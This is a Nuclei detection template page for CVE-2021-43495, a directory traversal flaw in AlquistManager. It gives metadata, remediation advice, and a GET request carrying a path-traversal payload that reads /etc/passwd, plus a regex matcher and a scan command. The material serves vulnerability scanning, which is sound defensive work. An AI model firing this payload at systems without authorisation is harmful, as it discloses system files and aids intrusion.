Skip to content
Nuclei Templates

AlquistManager Local File Inclusion

ID: CVE-2021-43495

Severity: high

Author: pikpikcu

Tags: cve2021,cve,lfi,alquist,alquistai

Description

Section titled “Description”

AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.

YAML Source

Section titled “YAML Source”
id: CVE-2021-43495


info:
  name: AlquistManager Local File Inclusion
  author: pikpikcu
  severity: high
  description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or remote code execution.
  remediation: |
    Ensure that user-supplied input is properly validated and sanitized before being used in file inclusion functions.
  reference:
    - https://github.com/AlquistManager/alquist/issues/43
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43495
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-43495
    cwe-id: CWE-22
    epss-score: 0.03503
    epss-percentile: 0.9064
    cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: alquistai
    product: alquist
  tags: cve2021,cve,lfi,alquist,alquistai


http:
  - method: GET
    path:
      - "{{BaseURL}}/asd/../../../../../../../../etc/passwd"


    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4a0a00473045022100b43c9ac408018b86c4f3c81a8edf2ac80739298a3e0a08aefc0ff41767a4773902203d5274a40adef508f44fda9256b076cfb2bd3a4a9a55ad58b2eca4ae2951905c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-43495.yaml"

View on Github